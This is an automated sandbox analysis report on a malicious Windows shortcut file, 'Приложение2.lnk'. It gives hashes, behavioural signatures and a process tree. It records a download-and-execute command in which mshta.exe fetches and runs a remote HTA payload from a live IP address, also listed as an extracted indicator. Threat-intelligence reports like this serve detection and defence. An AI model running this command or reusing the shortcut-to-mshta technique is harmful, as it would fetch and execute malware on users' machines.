Analysis
-
max time kernel
55s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
12-04-2023 04:44
Static task
static1
Behavioral task
behavioral1
Sample
Приложение2.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Приложение2.lnk
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
сканированный документ.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
сканированный документ.exe
Resource
win10v2004-20230221-en
General
-
Target
Приложение2.lnk
-
Size
1KB
-
MD5
4443dc6bc9015b039ab514e4b23be5d6
-
SHA1
b0935265193593373bf2744f11ce7acdd4a1970b
-
SHA256
3f6d866f09cfabb1aa2a0393d290533ed31705c87b85f77edc3fdd51b90f6e24
-
SHA512
3b317782345b0f78dec005d826894560991d698d003ba9da50f3f2d5347c7a632b1057a0323a024c80762a18f8288e1c50ab53dbe664c5f88b22c446b628f19d
Malware Config
Extracted
http://94.103.86.38/ms1.hta
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 996 mshta.exe 5 996 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1616 wrote to memory of 996 1616 cmd.exe 29 PID 1616 wrote to memory of 996 1616 cmd.exe 29 PID 1616 wrote to memory of 996 1616 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Приложение2.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://94.103.86.38/ms1.hta2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:996
-